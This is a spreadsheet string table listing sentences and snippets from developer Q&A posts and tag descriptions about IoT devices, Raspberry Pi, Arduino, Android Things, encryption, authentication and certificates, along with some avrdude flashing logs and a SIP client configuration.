  <si>
    <t>Popular hash functions include sha (sha-1, sha256, sha512, and sometime in 2012 SHA-3), md5, md6, crc (crc16, crc32, crc64), ripemd, and many others, often specialized for particular uses.</t>
  </si>
  <si>
    <t>I am eager to know if it is possible for a spoofing attack on a serial communication like RS232?</t>
  </si>
  <si>
    <t>But, apparently, only the last defined debug is valid, overriding the first one.</t>
  </si>
  <si>
    <t>It then gets sent to another function for checksum validation.</t>
  </si>
  <si>
    <t>But when I attached (connected) the board by USB cable to Android device MPgio MiniPad, I have no sign of detection with my codes above.</t>
  </si>
  <si>
    <t>However, when I receive the response apdu, the last 9 bytes are corrupted.</t>
  </si>
  <si>
    <t>The purpose of this script is to test and see if it will unlock a electromechanical lock for 5secs.</t>
  </si>
  <si>
    <t>the items can be identified by the first 3 digits of the barcode.</t>
  </si>
  <si>
    <t>But I want to make sure that the sender/receiver all are authentic.</t>
  </si>
  <si>
    <t>I have problems with authorization token signature.</t>
  </si>
  <si>
    <t>My project is about unlock and lock door through web server.</t>
  </si>
  <si>
    <t>Regardless, this poses a deployment problem as we cannot afford to have a rogue Bluetooth signal overloading the system.</t>
  </si>
  <si>
    <t>I saw that the device try to connect to some IP's and if there is no response it assumes that the connection is going through a captive portal.</t>
  </si>
  <si>
    <t>I ask my self if there are any ways to send data per SSL encrypted on an UWP.</t>
  </si>
  <si>
    <t>I have even tried to add a small delay so that I know that the system logged in.</t>
  </si>
  <si>
    <t>The goal is to use Voice Recognition to send a login number to a device.</t>
  </si>
  <si>
    <t>I hope to secure the login using one of the schemes here: How to prevent WiFi Password from being leaked from Lua code?</t>
  </si>
  <si>
    <t>Lock Door
Lock Door
Lock Door
Lock Door
if anyone can address the problem, I posted the Code for both Arduino and ESP
ESP Code
ARDUINO Code
Thank you.</t>
  </si>
  <si>
    <t>How reliable is this way of getting phone number information.</t>
  </si>
  <si>
    <t>What I am trying to achieve is that php gets the values(ssid and password) of the network, and pass it on to python so that it can connect.</t>
  </si>
  <si>
    <t>I'm not sure if it's possible or not, but I'd rather not have the a program just type out the password without knowing if it's locked or not.</t>
  </si>
  <si>
    <t>I was wondering what the process is for enabling encryption for the peripheral.</t>
  </si>
  <si>
    <t>I want to sign on to an account on boot automatically, for example, username: user; password: password.</t>
  </si>
  <si>
    <t>Or do they just mean the authentication process instead of a secured and encrypted connection?</t>
  </si>
  <si>
    <t>Ive been able to use strcpy, strncpy and memcpy successfully in void decrypt() so all I can think is that it's the unsigned char type.</t>
  </si>
  <si>
    <t>The ESP will interface with an Electron/React application which will decrypt the encrypted payloads transmitted from the ESP.</t>
  </si>
  <si>
    <t>Running this jar on the raspy do not cause any problems, it opens the browser and let me authentificate.</t>
  </si>
  <si>
    <t>I want to send sensitive data through Cloud IoT Config, but not sure of if there is any encryption.</t>
  </si>
  <si>
    <t>Is there any form of encryption that happens for config messages between server and device?</t>
  </si>
  <si>
    <t>I am trying to create certificates signed by my root CA certificate using Java, but not much luck.</t>
  </si>
  <si>
    <t>I've created a group of registration with Symmetric key attestation.</t>
  </si>
  <si>
    <t>I also add a simple preamble in my data to check data integrity.</t>
  </si>
  <si>
    <t>To do so, you would need to know the seed generation algorithm for security sessions access and then be able to send new data to the ECU.</t>
  </si>
  <si>
    <t>You might be able to just use authenticated messages built on shared secrets.</t>
  </si>
  <si>
    <t>I see that your validateKnock method isn't posted, so it's impossible to say why it might not be working if that is the issue.</t>
  </si>
  <si>
    <t>with added double quotes to keep it safer.</t>
  </si>
  <si>
    <t>A quick hack would be:
That should increase with volume.</t>
  </si>
  <si>
    <t>Another problem you will have is that FTP is extremely insecure.</t>
  </si>
  <si>
    <t>Killing the processes is a bit of a hack.</t>
  </si>
  <si>
    <t>HCE services can function from the lock-screen however.</t>
  </si>
  <si>
    <t>As to the title:
Are casts as safe as unions?</t>
  </si>
  <si>
    <t>Probably cause by the lack of udev in your new setup which change the permission for those gpio in /sys/class.</t>
  </si>
  <si>
    <t>To avoid re-inventing the wheel, take a look at www.pfod.com.au, which has a general purpose Android app to control micro devices via bluetooth or wifi with optional 128 bit security.</t>
  </si>
  <si>
    <t>(Initially I assumed you always got an undetected error return, so the structure would be returned unmodified.)</t>
  </si>
  <si>
    <t>You could background your process so it will run when your ssh session is no longer running.</t>
  </si>
  <si>
    <t>The User-Name is not sent from the server in an encrypted format, the User-Password is.</t>
  </si>
  <si>
    <t>You could use the RaspberryPi unique Serial Number.</t>
  </si>
  <si>
    <t>The issue was produced by calling the program via ssh.</t>
  </si>
  <si>
    <t>Having had a cursory glimpse of your Kickstarter page -- I assume that your final system will be secure.</t>
  </si>
  <si>
    <t>This makes it pretty much impossible to do anything security related.</t>
  </si>
  <si>
    <t>When you enter  the rest of the program is blocked for about 5s.</t>
  </si>
  <si>
    <t>If you have a 0x00 in the middle your passphrase, it is technically invalid, as per the IEEE 802.11 standards.</t>
  </si>
  <si>
    <t>Neither of them are in the list of ciphers the SSL certificate used by httpbin.org supports.</t>
  </si>
  <si>
    <t>These ought to simplify connecting your device to Azure quite a bit by handling authentication for you.</t>
  </si>
  <si>
    <t>But might be critical/impossible via the internet, so if not all agents are in the same network.</t>
  </si>
  <si>
    <t>However, I think it's still quite possible using the Pin 18 as the CS pin if you hack the spi driver a little bit.</t>
  </si>
  <si>
    <t>If you mean by SFTP FTP over SSL you need to be able to make a SSL protocol run with all the cryptography involved.</t>
  </si>
  <si>
    <t>Just to be safe, I would recommend using the same Raspberry Pi model (although it probably doesn't matter)</t>
  </si>
  <si>
    <t xml:space="preserve"> binary in DP 4, so as in all the previous dev previews, has world-executable permission, i.e.</t>
  </si>
  <si>
    <t>However, the exists the possibility to mount a WiFi De-Auth attack against your own clients.</t>
  </si>
  <si>
    <t>Whether that's safe or not depends on the managed object.</t>
  </si>
  <si>
    <t>There are also mechanisms available, in linux/unix, to limit access from outside the internal net (/etc/hosts.</t>
  </si>
  <si>
    <t>There may (also) be issues with cipher suits that don't match between the firmware and the API provider(s).</t>
  </si>
  <si>
    <t>If you want to enable password authentication, you could create a separate  user account.</t>
  </si>
  <si>
    <t>There are Java samples out there if you need to use Java, it seems a bit suboptimal to use a client when you'll need to regenerate the password every hour.</t>
  </si>
  <si>
    <t>For more details, you could refer to Create a self-signed certificate.</t>
  </si>
  <si>
    <t>Furthermore, the use of an RTC module is much more reliable as there is no possibility of connection problems or anything else.</t>
  </si>
  <si>
    <t>I just want to use ejabberd for private messaging with friends and
  family, 1.</t>
  </si>
  <si>
    <t>When AWS AppSync invokes your resolver, it will generate a SigV4 signature using the attached role and call the AWS IoT Device Shadow service.</t>
  </si>
  <si>
    <t>Create a separate function for connecting Device with WiFi.</t>
  </si>
  <si>
    <t>A more reliable approach to running the motor until the button is released is to use a "no-code" timeout.</t>
  </si>
  <si>
    <t>As they are thread-safe, they can be shared between processes.</t>
  </si>
  <si>
    <t>A ZigBee device also has a 16-bit address (use the MY command), which is only guaranteed to be unique on its network.</t>
  </si>
  <si>
    <t>In some but not all languages that recognize this qualifier the access to such data is thread safe.</t>
  </si>
  <si>
    <t>Various proofs define different HTTP Authentication methods, e.g.</t>
  </si>
  <si>
    <t>A Payment Provider owned by MasterCard, who provide e-commerce services to a range of businesses</t>
  </si>
  <si>
    <t>The CoSign Signature Web Agent (CSWA) and the CoSign Signature API (SAPI) are used by developers to sign via the CoSign hardware devices or from the CoSign Cloud service.</t>
  </si>
  <si>
    <t>DPAPI is the API in Windows that allows a program to store "secrets", like passwords.</t>
  </si>
  <si>
    <t>A security manager is an object that defines a security policy for an application.</t>
  </si>
  <si>
    <t>A device or a software which purpose is to decode an encoded signal or stream.</t>
  </si>
  <si>
    <t>Rocket is a new container runtime, designed for composability, security, and speed.</t>
  </si>
  <si>
    <t>Node.js package for HTTP basic and digest access authentication.</t>
  </si>
  <si>
    <t>A tool in the Android SDK Build Tools which allows you to create and confirm APK signatures</t>
  </si>
  <si>
    <t>an Oracle PL/SQL error message which tells the related identifier must be declared in the routine.</t>
  </si>
  <si>
    <t>Jinx makes buggy multi-threaded programs unlucky, as if they were jinxed.</t>
  </si>
  <si>
    <t>An NSHTTPCookie object represents an HTTP cookie.</t>
  </si>
  <si>
    <t>Shelly commands must be run in the ShIO monad which is sandboxed so that each instance of the monad is thread safe.</t>
  </si>
  <si>
    <t>The contents of Secure Notes are also encrypted.</t>
  </si>
  <si>
    <t>Connect to any server via TCP/IP or via Unix Domain Sockets on *nix platforms, optionally SSL encrypted.</t>
  </si>
  <si>
    <t>Every element in an array is uniquely identifiable by at least one index.</t>
  </si>
  <si>
    <t>Spring Insight uses AspectJ to intercept operations in target web applications.</t>
  </si>
  <si>
    <t>Examples of items commonly provisioned include:
Virtualized Servers
Security Certificates</t>
  </si>
  <si>
    <t>Here are the nice features you get from using a shared primary key.</t>
  </si>
  <si>
    <t>The safety of the files depends upon the hosting websites.</t>
  </si>
  <si>
    <t>The role name can be used in defining an security-constraint in web.xml and as argument of HttpServletRequest#isUSerInRole.</t>
  </si>
  <si>
    <t>Metaio SDK - The Metaio SDK allows developers to use content without prior encryption.</t>
  </si>
  <si>
    <t>2 -   Volley provides transparent disk and memory caching.</t>
  </si>
  <si>
    <t>You may define a primaryKey property to override this convention.</t>
  </si>
  <si>
    <t>Mobile Apps
Android Login can use a number of different classes to request and manage permissions.</t>
  </si>
  <si>
    <t>Therefore, syslog-ng supports the Transport Layer Security (TLS) protocol to encrypt the communication.</t>
  </si>
  <si>
    <t>PayPal responds with a token, representing that user's session.</t>
  </si>
  <si>
    <t>Keys are unique by definition so the commonly used term "unique key" is actually a tautology.</t>
  </si>
  <si>
    <t>It can handle operations such as users subscribing and unsubscribing, as well as update of users.</t>
  </si>
  <si>
    <t>Apps that use these functions must be signed by a certificate that matches the certificate in the device's Universal Integrated Circuit Card (UICC).</t>
  </si>
  <si>
    <t>Gas, an internal transaction pricing mechanism, is used to mitigate spam and allocate resources on the network.</t>
  </si>
  <si>
    <t>A successful AJAX request will also trigger a silent recheck (if interceptRequests is not false).</t>
  </si>
  <si>
    <t>Unlike other uTorrent APIs floating around, token authentication is implemented.</t>
  </si>
  <si>
    <t>Rotation of secrets for databases and messaging services.</t>
  </si>
  <si>
    <t>Lock servers: instances of the Chubby distributed lock service.</t>
  </si>
  <si>
    <t>With the full trust level, a code can do anything that the account running it can do.</t>
  </si>
  <si>
    <t>Any cryptographic hash function, such as MD5 or SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly.</t>
  </si>
  <si>
    <t>All the classes are immutable and thread-safe.</t>
  </si>
  <si>
    <t>Specifying ranges enables you to create fewer security rules.</t>
  </si>
  <si>
    <t>Authenticators are used to manage both the client and server side of authentication.</t>
  </si>
  <si>
    <t>An anonymous class is defined and instantiated in a single succinct expression using the new operator.</t>
  </si>
  <si>
    <t>Relations and their integrity are automatically managed for you.</t>
  </si>
  <si>
    <t>PHP 5.3 caused many headaches for legacy software as a number of mechanisms PHP had relied on were deprecated (most notably  and safe_mode).</t>
  </si>
  <si>
    <t>Depending on the service doing the crawling, Googlebot can present different user agent names.</t>
  </si>
  <si>
    <t>This includes classical "authentication and authorization" terms too.</t>
  </si>
  <si>
    <t>Modern releases of Xlib no longer do their own network access, leaving that work to XCB.</t>
  </si>
  <si>
    <t>I thought my SO profile was too weak (&lt;20K rep, lack of some badges).</t>
  </si>
  <si>
    <t>This character is a command that will represent a packet recover command.</t>
  </si>
  <si>
    <t>I'm kinda at the end of my rope here and can't figure out where the ownership of the device is locked up.</t>
  </si>
  <si>
    <t>I'm trying to downgrade it to 4.6.1 using n. However, i'm getting the following error after a long wait
pi@raspberrypi:~ $ sudo n 4.6.1
Error: invalid version 4.6.1
Can anyone provide the root cause of this along with the possible fix?</t>
  </si>
  <si>
    <t>Also, for experimentation purposes, you are welcome to use any two bytes for the company identifier that you want.</t>
  </si>
  <si>
    <t>Thus, you can achieve the goal of protecting the serial device.</t>
  </si>
  <si>
    <t>Passphrases are often used to control both access to, and operation of, cryptographic programs and systems.</t>
  </si>
  <si>
    <t>Other than Secure Notes created with Keychain Access, only the password is encrypted, with Triple DES.</t>
  </si>
  <si>
    <t>BTrace is a safe, dynamic tracing tool for Java.</t>
  </si>
  <si>
    <t>Sample
References
Documentation
Encrypt and decrypt content with Nodejs
How to use the crypto module</t>
  </si>
  <si>
    <t>Brief Introduction
RSA SecurID Access provides the benefits and functionality of RSA Authentication Manager, the SSO Agent, and Identity Assurance combined into one product.</t>
  </si>
  <si>
    <t>This fingerprint may be used for data deduplication purposes.</t>
  </si>
  <si>
    <t>On update, it yelled at me with:
GPG error: http://ftp.de.debian.org wheezy Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 8B48AD6246925553 NO_PUBKEY 6FB2A1C265FFB764
because I'm not on debian, but I did
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 8B48AD6246925553
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6FB2A1C265FFB764
It told me no ultimately trusted keys found.</t>
  </si>
  <si>
    <t>Azure BlockChain Workbench is an attempt by Microsoft to encapsulate private block chain and smart contract development through a common set of APIs.</t>
  </si>
  <si>
    <t>This is where Parallel SSH or PSSH tool comes in handy, is a python based application, which allows you to execute commands on multiple hosts in parallel at the same time.</t>
  </si>
  <si>
    <t>Or do we need multiple certificates too?</t>
  </si>
  <si>
    <t>The SAS token is generated by DeviceExplorer.</t>
  </si>
  <si>
    <t>Parallel SSH or PSSH, allows to execute commands on multiple linux hosts in parallel at the same time.</t>
  </si>
  <si>
    <t>I need that the string that has been token from the serial terminal is interpreted as hex.</t>
  </si>
  <si>
    <t>Possible issues are:
- your BLE device requires to be connected with a RANDOM address (and not PUBLIC).</t>
  </si>
  <si>
    <t>Abstract from official RFC file:
This memo represents a republication of PKCS #5 v2.0 from RSA
  Laboratories' Public-Key Cryptography Standards (PKCS) series, and
  change control is retained within the PKCS process.</t>
  </si>
  <si>
    <t>However, due to certain requirements I may have certificates that are no longer valid or deleted device ids.</t>
  </si>
  <si>
    <t>This is a security-through-obscurity: you are protected until someone reverses your setup and gets the salt and protocol.</t>
  </si>
  <si>
    <t>The GetProfiles request itself does not depend on any input parameters so you should be safe here.</t>
  </si>
  <si>
    <t>I want to use a fast but safe encryption method and thought that AES would fit in nicely.</t>
  </si>
  <si>
    <t>I have a simple bare metal Raspberry Pi project in which I'm trying to implement spin locks.</t>
  </si>
  <si>
    <t>-- 
I have an Arduino Uno and trying to program a locking mechanism using knocks (as per the examples book).</t>
  </si>
  <si>
    <t>Is there an off-the-shelf solution to keep the possibility to create a SSH connection to them?</t>
  </si>
  <si>
    <t>Here I am using device ownership as COPE, in this scenario its essential to transfer device to other owner, like admin to standard user.</t>
  </si>
  <si>
    <t>You have to turn "Driver &gt; Signature Enforcement" off during system boot- up.</t>
  </si>
  <si>
    <t>You need proper permissions for the www folder, and that depends on which webserver you are running.</t>
  </si>
  <si>
    <t>But note that the 192.168.x.x range of addresses are only used for private, internal networks.</t>
  </si>
  <si>
    <t>Also, this function only takes a single parameter, the pin number.</t>
  </si>
  <si>
    <t>check db: shared, not protected when used, and created in each thread.</t>
  </si>
  <si>
    <t>Usage of any other command or editor may turn sudo unusable and lock you out of any root access!</t>
  </si>
  <si>
    <t>You could also run the program in background
Or use screen 
Using these command you wont block your shell.</t>
  </si>
  <si>
    <t>The header of such an authorization must look like (Wikipedia):
In short, you're probably just missing the "Basic" part.</t>
  </si>
  <si>
    <t>If no correct reply, the number is being added to blacklist.</t>
  </si>
  <si>
    <t>I'm not sure what you are trying to achieve, if it is documentation or something in code, but fwiw AndroidThings act's differently for permissions, so you don't have to do anything in your codebase.</t>
  </si>
  <si>
    <t>In this case Client ID will be used to distinguish data from the different sensors similar to primary key.</t>
  </si>
  <si>
    <t>It then warned me to change the password, and in the same window, I was able to define the home folder.</t>
  </si>
  <si>
    <t>This way just the first successful punch on in a day from the card will be inserted in the database.</t>
  </si>
  <si>
    <t>This sample demonstrates how you can open the user's browser with your OAuth 2.0 authorization request, without using WebAuthenticationBroker.</t>
  </si>
  <si>
    <t>Alternatively, you could use Firebase Authentication to allow your users to sign in with their email or other methods.</t>
  </si>
  <si>
    <t>Public changesets cannot easily be rebased, etc., providing a level of safety when mutating repositories.</t>
  </si>
  <si>
    <t>A monoid is a set that is closed under an associative binary operation and has an identity element I  Such that for all a  S, Ia = aI = a.</t>
  </si>
  <si>
    <t>A password generator is a system or program that creates random passwords to be used to secure other systems.</t>
  </si>
  <si>
    <t>An OleDbConnection object represents a unique connection to a data source.</t>
  </si>
  <si>
    <t>It is generally used for password hashing in the realm of LDAP.</t>
  </si>
  <si>
    <t>Microsoft SEAL is a fast and user-friendly homomorphic encryption library created by Microsoft Research.</t>
  </si>
  <si>
    <t>A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.</t>
  </si>
  <si>
    <t>One of the main principles in Csound development is to guarantee backwards compatibility.</t>
  </si>
  <si>
    <t>This community is for developers using the Topaz signature capture hardware.</t>
  </si>
  <si>
    <t>This makes using undocumented features a double-edged sword.</t>
  </si>
  <si>
    <t>Practical applications are found in error correcting codes , cryptography, chemistry, physics, and other fields.</t>
  </si>
  <si>
    <t>Applications using VBA 7 must address both backwards compatibility and 64-bit-safe issues.</t>
  </si>
  <si>
    <t>The Physical Security Interoperability Alliance (PSIA) is a global consortium of more than 65 physical security manufacturers and systems integrators focused on promoting interoperability of IP-enabled security devices and systems across the security ecosystem and beyond.</t>
  </si>
  <si>
    <t>It is a self-hosted chat app for small teams built by Security Compass.</t>
  </si>
  <si>
    <t>Let's Encrypt is a certificate authority that provides free X.509 certificates for Transport Layer Security encryption (TLS).</t>
  </si>
  <si>
    <t>ktpass.exe is the command used to create a key table file (keytab) in a Windows Active Directory network.</t>
  </si>
  <si>
    <t>IP spoofing involves trickery that makes a message appear as if it came from an authorized IP address.</t>
  </si>
  <si>
    <t>Warehouse employees scan bar codes to move product through the warehouse.</t>
  </si>
  <si>
    <t>The built-in referential integrity is good but not as in highly normalized databases though.</t>
  </si>
  <si>
    <t>The cellular module I have is handling the X.509 certificates for mutual TLS authentication.</t>
  </si>
  <si>
    <t>Lazy registration is a way to allow users to try the site out before they sign up, no strings attached.</t>
  </si>
  <si>
    <t>Pkcs11Interop is managed .NET wrapper for unmanaged PKCS#11 libraries that provide access to the cryptographic hardware</t>
  </si>
  <si>
    <t>The message identifier returned by
this function is guaranteed to be unique throughout the system.</t>
  </si>
  <si>
    <t>the reader is set to use any tag this is not good for secure applications like locks like in the video above.</t>
  </si>
  <si>
    <t>On the sensor side, the library of CuHead WiFi Shield lacks important functions to create secure connections.</t>
  </si>
  <si>
    <t>Getting to the final state of decrypting the payload I am unsure if I am using the mbedtls library right, as I can't get it to work properly.</t>
  </si>
  <si>
    <t>The oauth2client library comes as part of the google-api-python-client, but is also available as a separate download if you just need the OAuth 2.0 capabilities.</t>
  </si>
  <si>
    <t>Now i want to access it over a public ip via.</t>
  </si>
  <si>
    <t>I want to convert my codes from Intel architecture to Raspbain.</t>
  </si>
  <si>
    <t>I have the code signing and provisioning profile setup correctly and even did a test submit to iTunesConnect.</t>
  </si>
  <si>
    <t>You can do "arp-scan -l -r10" for that (tested this myself), but the problem is if mobile data enabled the iphone will go and suspend wifi if screen is locked to safe battery.</t>
  </si>
  <si>
    <t>In android all networking requests have to be done in a background thread like this:
and of course you have to add the internet permission in your manifest</t>
  </si>
  <si>
    <t>The big but is that our clients in the field are running on a microcontroller (not a microprocessor) that has poor encryption libraries (embedded C, in particular PIC).</t>
  </si>
  <si>
    <t>TLS/SSL for instance provides encryption and session information between the network and transport layers.</t>
  </si>
  <si>
    <t>If your Gitlab host is not externally accessible by the Lets Encrypt servers, the whole process is much harder!</t>
  </si>
  <si>
    <t>Class that holds the basic account information of the signed in Google user.</t>
  </si>
  <si>
    <t>Plain old anonymous mmaps and System V shared memory lack some of these requirements.</t>
  </si>
  <si>
    <t>This is a C# Library that allows .net developers to enable their applications 7zip compression and decompression as well as the encryption that goes with it.</t>
  </si>
  <si>
    <t>I compared all the permissions on both systems and they are exactly the same but I must be missing something.</t>
  </si>
  <si>
    <t>Enter the Client and Secret key to the web.config, &lt;providers&gt; section.</t>
  </si>
  <si>
    <t>This, in combination with virtually unlimited scalability, will enable the OMG Network to serve essentially all global transactions simultaneously.</t>
  </si>
  <si>
    <t>avrdude: erasing chip
avrdude: reading input file "main.hex"
avrdude: input file main.hex auto detected as Intel Hex
avrdude: writing flash (2336 bytes):
Writing | ################################################## | 100% 8.54s
avrdude: 2336 bytes of flash written
avrdude: verifying flash memory against main.hex:
avrdude: load data flash data from input file main.hex:
avrdude: input file main.hex auto detected as Intel Hex
avrdude: input file main.hex contains 2336 bytes
avrdude: reading on-chip flash data:
Reading | ################################################## | 100% 8.26s
avrdude: verifying ...
avrdude: 2336 bytes of flash verified
avrdude: safemode read 1, lfuse value: 62
avrdude: safemode read 2, lfuse value: 62
avrdude: safemode read 3, lfuse value: 62
avrdude: safemode: lfuse reads as 62
avrdude: safemode read 1, hfuse value: df
avrdude: safemode read 2, hfuse value: df
avrdude: safemode read 3, hfuse value: df
avrdude: safemode: hfuse reads as DF
avrdude: safemode read 1, efuse value: 1
avrdude: safemode read 2, efuse value: 1
avrdude: safemode read 3, efuse value: 1
avrdude: safemode: efuse reads as 1
avrdude: safemode: Fuses OK
avrdude done.</t>
  </si>
  <si>
    <t>Secure Connection Config</t>
  </si>
  <si>
    <t>avrdude: erasing chip
avrdude: reading input file "stk500boot_v2_mega2560.hex"
avrdude: writing flash (261406 bytes):
Writing | ################################################## | 100% 6.24s
avrdude: 261406 bytes of flash written
avrdude: verifying flash memory against stk500boot_v2_mega2560.hex:
avrdude: load data flash data from input file stk500boot_v2_mega2560.hex:
avrdude: input file stk500boot_v2_mega2560.hex contains 261406 bytes
avrdude: reading on-chip flash data:
Reading | ################################################## | 100% 11.71s
avrdude: verifying ...
avrdude: 261406 bytes of flash verified
avrdude: safemode: lfuse reads as FF
avrdude: safemode: hfuse reads as D8
avrdude: safemode: efuse reads as FD
avrdude: safemode: Fuses OK (E:FD, H:D8, L:FF)
avrdude done.</t>
  </si>
  <si>
    <t>for Android that are monitored by their respective developers:
commonsware-cwac ( datadroidactionbarsherlock (now deprecated))
retrofit dagger leakcanary android-glide butterknife otto picassogreendao
Android Versions
1.0 Astro (specified as BASE by Google)
1.1 Bender (specified as BASE_1_1 by Google)
android-1.5: 1.5 Cupcake
android-1.6: 1.6 Donut
android-2.0: 2.0/2.0.1/2.1 Eclair
android-2.2: 2.2-2.2.3 Froyo
android-2.3: 2.3-2.3.2/2.3.3-2.3.7 Gingerbread
android-3.0: 3.0/3.1/3.2 Honeycomb
android-4.0: 4.0-4.0.2/4.0.3-4.0.4 Ice Cream Sandwich
android-4.2: 4.1/4.2 - 4.2.2 Jelly Bean
android-4.3: 4.3 Jelly Bean MR2
android-4.4: 4.4-4.4.3 KitKat
android-l: Android L Preview
wear-os: Wear OS
android-5.0-lollipop: Android Lollipop 
android-5.1.1-lollipop: Android Lollipop MR1
android-6.0-marshmallow: Android Marshmallow and Android M Preview
android-6.0.1-marshmallow: Android Marshmallow
android-7.0-nougat: Android Nougat
android-7.1-nougat: Android Nougat 7.1
android-o: Android O Preview
android-8.0-oreo: Android Oreo
android-8.1-oreo: Android Oreo (Go edition)
android-p: Android P Preview
android-9.0-pie: Android Pie 9.0
androidq: Android Q Preview
Official API Documentation
Android 2.0 Eclair (API Level 5)
Android 2.0.1 Eclair (API Level 6)
Android 2.1 Eclair (API Level 7)
Android 2.2 Froyo (API Level 8)
Android 2.3 Gingerbread (API Level 9)
Android 2.3.3 Gingerbread (API Level 10)
Android 2.3.4 Gingerbread (API Level 10)
Android 3.0 Honeycomb (API Level 11)
Android 3.1 Honeycomb (API Level 12)
Android 3.2 Honeycomb (API Level 13)
Android 4.0 Ice Cream Sandwich (API Level 14)
Android 4.0.3 Ice Cream Sandwich (API Level 15)
Android 4.1 Jelly Bean (API Level 16)
Android 4.2 Jelly Bean MR1 (API Level 17)
Android 4.3 Jelly Bean MR2 (API Level 18)
Android 4.4 KitKat (API Level 19)
Android 5.0 (API Level 21)
Android 5.1 (API Level 22)
Android 6.0 (API Level 23)
Android 7.0 Nougat (API Level 24)
Android 7.1 Nougat (API Level 25)
Android 8.0 Oreo (API Level 26)
Android 8.1 Oreo (API Level 27)
Android P Preview (P)
Android 9.0 Pie (API Level 28)
Android Q Preview (Q)
Wear OS (API Level 20)
Android TV (API Level 21)
Android Auto
Android Things
Applications
Google Play
Google Play Console
Source Code and Building
Source Code
Source Mirrors
Android Git repositories
Android on GitHub
Building and Running
Building kernel
Developers
Android Developers 
Contains the SDK downloads, documentation, class reference and tutorials.</t>
  </si>
  <si>
    <t>The AVR compiler gives me this:
avrdude: 24348 bytes of flash written avrdude: verifying flash memory
  against SunAngles.hex: avrdude: load data flash data from input file
  SunAngles.hex: avrdude: input file SunAngles.hex auto detected as
  Intel Hex avrdude: input file SunAngles.hex contains 24348 bytes
  avrdude: reading on-chip flash data:
Reading | ################################################## | 100%
  3.45s
avrdude: verifying ... avrdude: 24348 bytes of flash verified
avrdude done.</t>
  </si>
  <si>
    <t>I can see HC-05 is classic bluetooth device and Wondering as Android things not give popup to enter passkey is making the problem to connect the HC-05 or is there something I am missing 
I am getting below error 
ConnectThread run: IO Exceptionjava.io.IOException: read failed, socket might closed or timeout, read ret: -1
  D/BluetoothSocket: close() this: android.bluetooth.BluetoothSocket@ea69040, channel: -1, mSocketIS: android.net.LocalSocketImpl$SocketInputStream@e5f1b79, mSocketOS: android.net.LocalSocketImpl$SocketOutputStream@173c0bemSocket: android.net.LocalSocket@3f7251f impl:android.net.LocalSocketImpl@284706c fd:java.io.FileDescriptor@c2cf635, mSocketState: INIT
  D/BluetoothSocket: close() this: android.bluetooth.BluetoothSocket@4272aca, channel: -1, mSocketIS: android.net.LocalSocketImpl$SocketInputStream@5f2f43b, mSocketOS: android.net.LocalSocketImpl$SocketOutputStream@f7e2758mSocket: android.net.LocalSocket@ec3c0b1 impl:android.net.LocalSocketImpl@7f52996 fd:java.io.FileDescriptor@6129917, mSocketState: INIT</t>
  </si>
  <si>
    <t>Successfully registered with voip.ms
I have an account and phone number with Voip.ms and can become registered with voip.ms by executing the following script:
call_and_auto_answer.sh
Where the config looks like:
sip.cfg
#
# Logging options:
#
--log-level 5
--app-log-level 4
#
# Account 0:
#
--id sip:&lt;my-subaccount-username&gt;@sip.voip.ms
--registrar sip:&lt;server-location&gt;.voip.ms
--reg-timeout 300
--realm *
--username &lt;my-subaccount-username&gt;
--password &lt;my-subaccount-password&gt;
--use-timer 1
#
# Network settings:
#
--local-port 5060
#
# Media settings:
#
--srtp-keying 0
--auto-play
--auto-loop
--play-file /home/pi/CantinaBand60.wav
--snd-auto-close 1
#using default --clock-rate 16000
#using default --quality 8
#using default --ec-tail 200
#using default --ilbc-mode 30
--rtp-port 4000
#
# User agent:
#
--auto-answer 200
--max-calls 5
#
# SIP extensions:
#
--use-timer 1
When I enter the cli, I see for my account list:
Account list:
  [ 0] &lt;sip:192.168.1.49:5060&gt;: does not register
       Online status: Online
  [ 1] &lt;sip:192.168.1.49:5060;transport=TCP&gt;: does not register
       Online status: Online
 *[ 2] sip:&lt;my-subaccount-username&gt;@sip.voip.ms: 200/OK (expires=285)
       Online status: Online
Buddy list:
 -none-
Voip.ms shows I've registered on their website.</t>
  </si>
  <si>
    <t>I'm trying to get a user's Calendar events on the Android Things platform, and found the following tutorial showing a way to do this:
https://medium.com/@F8Full/getaroom-android-things-google-calendar-api-2ab72a5b957f
I've got the authorisation code from the user on the mobile and sent that across to the Android Things device.</t>
  </si>
  <si>
    <t>I am following this tutorial for connecting Raspberry Pi to AWS IoT using Node.js SDK and I have done all the other steps but I am lost in the authentication and certificate step:
When I browse to https://A34SXNTM6AT7XH.iot.us-west-2.amazonaws.com/things/MyNewThing/shadow or https://A34SXNTM6AT7XH.iot.us-west-2.amazonaws.com I see  message:
I am not sure how to get the last step working so I could see stuff in the URLs when I browse to them.</t>
  </si>
  <si>
    <t>Features:
A Rest Client for Android
Auth support for accessing secure APIs
More Information:
Project Page
Source (GitHub)
Sample Applications (GitHub)
API Documentation (Javadoc)
Reference Documentation
Issue Tracker (JIRA)
The Spring Blog
Getting Started Guides:
Consuming RESTful Web Services with Spring for Android
Consuming XML from a RESTful Web Service with Spring for Android
Building Android projects with Gradle
Building Android projects with Maven
Related Tags:
spring-framework
resttemplate
spring-social
android</t>
  </si>
  <si>
    <t>I tried to use the plain Java Calendar API, but on Android Things is failing due to a JVM incompatibility when I try to authenticate:
I have then tried to combine the code from the Google Assistant sample for Android Things with the Calendar API but looks like the Calendar API use a different Credential class from the Assistant sample ( vs com.google.auth.oauth2.UserCredentials).</t>
  </si>
  <si>
    <t>and this function must be called early as driver says:
/**
 * gpiochip_add() - register a gpio_chip
 * @chip: the chip to register, with chip-&gt;base initialized
 * Context: potentially before irqs or kmalloc will work
 *
 * Returns a negative errno if the chip can't be registered, such as
 * because the chip-&gt;base is invalid or already associated with a
 * different chip.</t>
  </si>
  <si>
    <t>To use PREEMPT_RT you just have to:
retrieve the configuration of your current kernel
retrieve the kernel sources
patch the kernel sources with the PREEMPT_RT patch (or obtain an already patched kernel) 
configure the new kernel as the current kernel (i.e., using )
enable full preemtability in kernel config (e.g., by running make menuconfig).</t>
  </si>
  <si>
    <t>I am using raspberry pi for detecting beacons but many times I have observed that there is inconsistent detection of beacons by raspberry pi.</t>
  </si>
  <si>
    <t>It should have some thing I don't understand, maybe in the device capabilities or permissions, which Microsoft tutorial doesn't mention here
